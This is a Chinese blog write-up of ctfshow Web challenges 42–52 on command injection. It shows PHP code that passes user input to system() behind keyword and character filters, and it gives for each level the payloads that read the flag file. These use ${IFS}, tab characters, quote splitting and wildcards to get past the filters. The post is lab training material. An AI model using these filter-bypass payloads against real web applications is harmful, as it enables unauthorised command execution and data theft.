ctfshow-Web入门-42~52wp(命令执行)

最新推荐文章于 2024-04-24 21:22:47 发布
最新推荐文章于 2024-04-24 21:22:47 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/108429145
版权

Web42

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

Payload

?c=ls;
查看flag位置

?c=cat f*;
查看源码得到flag

Web43

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了 分号,cat命令

/?c=ls|| 
得到flag位置

由于过滤了cat命令,所以使用 tail来查看flag内容
?c=tail -n 5 f*|| 

也可以使用 c"a"t f*||
来获取flag,查看源码得到
得到flag

Web44

和web43 可以用同一个payload

也可以使用
?c=c\a\t f*||

.

Web45

增加过滤了 空格

使用${IFS} 来绕过空格

tail${IFS}-n${IFS}5${IFS}f*||

Web46

(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c))

增加过滤了 $ 不能使用 Web45的方法来过滤空格

?c=awk%09'/f/'%09fla?.php||

?c=c"a"t%09fla??php||

得到flag

?c={awk,’/f/’,fla???hp}||

47、48、49 相同

Web50

?c=c'a't<>'fla'g.php||

Web51

?c=c'a't<>'fla'g.php||

Web52

?c=ls${IFS}-al${IFS}/||
得到flag位置

image-20200906200402903

?c=c'a't${IFS}/fl'ag'||

得到flag
赛博雨天
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web42
Kradress的博客
11-14 318
目录源码知识点题解 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c
Ctfshow web入门-web42
qq_45427131的博客
05-18 1143
web42 检查代码,发现代码似乎很简单?只需要输入命令执行,但是实际执行之后的小伙伴会发现如果只是输一个指令,回显都是空白,原因很简单。 在给变量c赋值的语句下面的语句”>/dev/null 2>&1“ ,可以将其理解成将输入的数写入黑洞 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出2
ctfshow web41-web50
最新发布
m0_73721944的博客
04-24 1005
web41代码审计过滤了:[0-9] [a-z] ^ + ~ $ [ ] { } & -这次字母过滤了,字符不是很多思路:通过特殊字符来构造字母从而实现代码执行这里根据题目提示已经给了一篇博客第一个脚本运行结果是解释一下是怎么得来的:A %40 %01十六进制的40=十进制的64=二进制0100 0000十六进制的01=十进制的01=二进制0000 0001二者进行或运算0100 00000000 00010100 0001不理解的话可以具体去看一下这个网址带着的表运行结果。
ctfshow-web42(命令执行)
m0_62094846的博客
01-25 869
shell重定向 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $.
CTFshow web42 43 44 45 46 47
ChenD的学习笔记
11-09 749
CTFshow web42 web43 web44 web45 web46 web47
[ctfshow]入门
qq_61109509的博客
01-18 1700
3,misc3 打开后发现后缀名是bpg.那就找能打开bpg的工具 4,misc4 打开发现几个.txt,改后缀名拼接是flag 也用python获得图片中文字的方法 import pytesseract from PIL import Image pytesseract.pytesseract.tesseract_cmd = r'D:\应用\Tesseract-OCR\tesseract.exe' tessdata_dir_config = r'--tessdata-dir "D:\应用
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
wp-easyarchives.zip_WordPress_wp-easyarchives
09-24
wordpress评论可以用来很好的方便
ctf.show 入门
Sky_Bird_的博客
12-03 1080
ctf.show web入门 1.web 1 打开后如图所示,按F12,看到flag 2.web 2 打开后发现按F12没有用,直接在网址前加view-source: 拿到flag 3.
web入门——ctfshow(3-20)(信息搜集)
weixin_73668856的博客
11-25 415
水水
ctfshow web入门1-28wp
Firebasky的博客
09-27 883
好久之前写在本地的,因为累了就不重新写博客啦 打印成pdf,需要的下载吧 链接:https://pan.baidu.com/s/18E-2RwOt5oWqiWF3E4ZVmg 提取码:dg4w
ctfshow web42-46
m0_69289738的博客
09-06 89
tac flag.php有空格,在ASCLL表中找一个不可显示的字符替代。空格的url编码是%20水平制表符的url编码是%09,我们用%09代替。源代码中的 >/dev/null 2>&1会让输入的c都输入到黑洞里。%09不算数字,在执行后会自动编码为水平制表符。直接改成tac flag.php得到flag。这题在上一题的基础上多过滤了一个flag。在上一题的基础上多过滤了;我们使用&符号分割,要对&进行编码。在上一题的基础上多过滤了数字,!选中&&对它进行编码就行。比上一题多过滤了空格。
无字母数字的命令执行(ctfshow web入门 56)
Firebasky的博客
09-12 2865
前面的一篇文章和这道题一样的做法 无字母数字的命令执行(ctfshow web入门 55) 需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次
CTFshow 命令执行 web52
Kradress的博客
11-20 1078
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web52(命令执行)
m0_62094846的博客
01-28 593
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c']; .
CTFSHOW Web入门 44-52
m0_50936156的博客
01-22 428
目录web 44web 45web 46web 47web 48web 49web 50web 51web 52 web 44 if(!preg_match("/;|cat|flag/i", $c)) {system($c." >/dev/null 2>&1"); 这题过滤了cat,flag 关于cat的过滤绕过可以用以下命令来替换 cat file1 从第一个字节开始正向查看文件的内容 tac file1 从最后一行开始反向查看一个文件的内容 more file1 查看一个长文
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值